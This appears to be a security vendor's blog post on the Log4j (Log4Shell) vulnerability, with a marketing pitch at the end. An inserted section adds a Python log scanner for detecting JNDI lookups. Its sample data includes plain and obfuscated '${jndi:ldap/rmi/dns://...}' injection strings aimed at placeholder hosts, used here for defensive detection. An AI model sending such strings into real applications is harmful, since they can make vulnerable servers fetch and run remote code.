On December 9, a major vulnerability was discovered in a popular open source software package; by the next day, companies were scrambling to figure out how best to respond.
You only get something as bad as Log4J every 4-5 years. It's real bad.
- Security Engineer at American Cyber
According to the Washington Post and Check Point Software, hackers have already tried to use it to get into nearly half of all corporate networks around the world. The motives are financial; however, on Dec. 15, Check Point said Iranian state-backed hackers used the vulnerability to try to break into Israeli government and business targets.
What is Log4j?
Apache Log4j is a Java-based logging library that software applications use to keep a record of their activity. Each time Log4j is asked to log a new entry, it processes that entry, including any lookup expressions embedded in it, before adding it to the record. A few weeks ago, researchers realized that an attacker can insert malicious content into a log message and use it to compromise any server running the vulnerable software.
Why is it so bad?
An attacker who can control log messages or log message parameters can execute code loaded from LDAP servers when message lookup substitution is enabled.
There are three main reasons why this vulnerability has a maximum CVSS severity score of 10.
It's relatively easy to execute - even for amateurs and script kiddies.
The remote code can be inserted pre-authentication. This means that the attacker does not have to sign in to internet-facing on-premise or cloud services.
IT and InfoSec teams cannot simply set up gateway blocking rules: there are many methods of obfuscation and evasion.
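The mechanism described above (attacker-controlled text reaching a log message, where lookup substitution turns it into a JNDI lookup) is also what a defender watches for in web and application logs. The following is an added example, not code from the original post or from American Cyber: a small Python scanner that expands the nested lookup syntax used to disguise the string `jndi` (the obfuscation the third point refers to) and flags log lines that resolve to a JNDI lookup, reporting which protocol was requested. The sample log lines, the `example.invalid` hosts and all function names are constructed for this example.

```python
import re
from typing import List, Optional, Tuple

# Matches an innermost Log4j lookup, i.e. "${...}" with no nested "${" inside.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# After normalisation, a JNDI lookup looks like "${jndi:<protocol>:...}".
_JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def _resolve(body: str) -> Optional[str]:
    """Expand one lookup body the way Log4j's interpolator would.

    Only the lookups commonly used to hide the word 'jndi' are modelled:
    'lower:', 'upper:' and the 'key:-default' fallback form (we assume the key
    never resolves, so the default branch is taken). Anything else returns
    None and is left in place, which also keeps the real jndi lookup intact.
    """
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return None


def normalize(text: str, max_rounds: int = 20) -> str:
    """Repeatedly expand innermost lookups until the text stops changing."""
    for _ in range(max_rounds):
        changed = False

        def _repl(match: "re.Match[str]") -> str:
            nonlocal changed
            expanded = _resolve(match.group(1))
            if expanded is None:
                return match.group(0)  # unknown lookup: keep as-is
            changed = True
            return expanded

        text = _INNER_LOOKUP.sub(_repl, text)
        if not changed:
            break
    return text


def scan_line(line: str) -> Tuple[bool, Optional[str]]:
    """Return (suspicious, protocol) for one log line."""
    match = _JNDI.search(normalize(line))
    if match is None:
        return False, None
    return True, match.group(1).lower()


def scan_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line index, protocol) for every line that hides a JNDI lookup."""
    hits = []
    for idx, line in enumerate(lines):
        suspicious, proto = scan_line(line)
        if suspicious:
            hits.append((idx, proto))
    return hits


# Constructed access-log lines: one benign request, one benign request that
# legitimately contains a lookup, and three that carry a (plain or disguised)
# JNDI lookup in the User-Agent field. Hosts use the reserved .invalid TLD.
SAMPLE_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET /status HTTP/1.1" 200 "monitor ${env:HOSTNAME}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://example.invalid:1389/x}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:r}mi://example.invalid/y}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:dns://example.invalid/z}"',
]

if __name__ == "__main__":
    for idx, proto in scan_lines(SAMPLE_LINES):
        print(f"line {idx}: JNDI lookup via {proto}")
```

Running the block prints one alert per disguised line (ldap, rmi, dns) and stays quiet on the two benign lines, including the one with an ordinary `${env:...}` lookup. Detection of this kind surfaces attempts after the fact; it does not replace upgrading the affected Log4j versions, which is why the post stresses both vendor patches and monitoring.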
What should you do?
The majority of all software providers are rapidly working to update their software product code. For example, more than 500 engineers at Google worked day and night reviewing code to make sure this vulnerability did not impact the security of their products.
It is absolutely critical for IT and Information Security teams to monitor inbound and outbound traffic and respond to suspicious alerts generated from their security products.
Businesses that do not have trained information security professionals who can deploy, configure, manage and monitor these products need to partner with a specialized service provider that can detect, protect against and respond to suspicious security events.
American Cyber recommends investing in MDR, XDR and Incident Response services to combat ransomware and other cyber actors that are likely to try and exploit this vulnerability.
Partnering with a specialized service provider that has a fully integrated solution delivers positive security and risk mitigation outcomes for your business.
For a limited time only, American Cyber is extending 30 days of free security monitoring to help alert small and medium businesses to cyber attacks that might impact their operations.